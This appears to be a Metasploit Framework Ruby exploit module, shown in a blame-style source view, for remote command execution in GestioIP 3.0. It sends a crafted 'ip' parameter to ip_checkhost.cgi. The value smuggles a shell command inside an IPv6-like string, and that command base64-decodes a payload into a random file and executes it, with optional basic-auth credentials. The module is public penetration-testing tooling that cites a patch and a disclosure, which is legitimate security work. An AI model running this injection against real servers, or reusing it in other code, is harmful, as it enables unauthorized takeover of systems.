metasploit-framework/modules/exploits/multi/http/gestioip_exec.rb

94 lines
2.8 KiB
Ruby
Raw Normal View History

2013-10-04 13:39:30 +00:00
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
2013-10-04 13:39:30 +00:00
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'GestioIP Remote Command Execution',
'Description' => %q{
This module exploits a command injection flaw to create a shell script
on the filesystem and execute it. If GestioIP is configured to use no authentication,
no password is required to exploit the vulnerability. Otherwise, an authenticated
user is required to exploit.
2013-10-04 13:39:30 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry' #Initial Discovery and metasploit module
],
'References' =>
[
[ 'URL', 'http://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c/' ], # Patch
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2461' ], # First disclosure
[ 'URL', 'https://community.rapid7.com/community/metasploit/blog/2013/10/03/gestioip-authenticated-remote-command-execution-module' ]
2013-10-04 13:39:30 +00:00
],
'Payload' =>
{
'Space' => 475, # not a lot of room
'DisableNops' => true,
2013-10-04 18:29:27 +00:00
'BadChars' => "",
2013-10-04 13:39:30 +00:00
},
2013-10-04 18:29:27 +00:00
'Platform' => [ 'unix' ],
2013-10-04 13:39:30 +00:00
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic GestioIP 3.0', { }]],
'Privileged' => false,
'DisclosureDate' => 'Oct 4 2013',
2013-10-04 13:39:30 +00:00
'DefaultTarget' => 0))
register_options(
[
2013-10-04 18:29:27 +00:00
OptString.new('TARGETURI', [true, 'URI', '/gestioip/']),
2013-10-04 13:39:30 +00:00
OptString.new('USERNAME', [false, 'The username to auth as', 'gipadmin']),
OptString.new('PASSWORD', [false, 'The password to auth with', nil])
2013-10-04 13:39:30 +00:00
], self.class)
end
def user
datastore['USERNAME']
end
def pass
datastore['PASSWORD']
end
def use_auth
!(pass.nil? or pass.empty?)
2013-10-04 13:39:30 +00:00
end
def exploit
2013-10-04 18:29:27 +00:00
pay = Rex::Text.encode_base64(payload.encoded)
file = Rex::Text.rand_text_alpha(8)
options = {
'uri' => normalize_uri(target_uri.path, "ip_checkhost.cgi"),
'encode_params' => false,
'vars_get' => {
'ip' => "2607:f0d0:$(echo${IFS}" + pay + "|base64${IFS}--decode|tee${IFS}"+file+"&&sh${IFS}"+file+"):0000:0000:0000:0000:0004",
'hostname' => "fds",
'client_id' => "1",
'ip_version' => ""
}
}
2013-10-04 13:39:30 +00:00
if use_auth
2013-10-04 18:29:27 +00:00
options.merge!('authorization' => basic_auth(user,pass))
end
res = send_request_cgi(options)
if res and res.code == 401
fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Please provide USERNAME and PASSOWRD")
2013-10-04 13:39:30 +00:00
end
end
end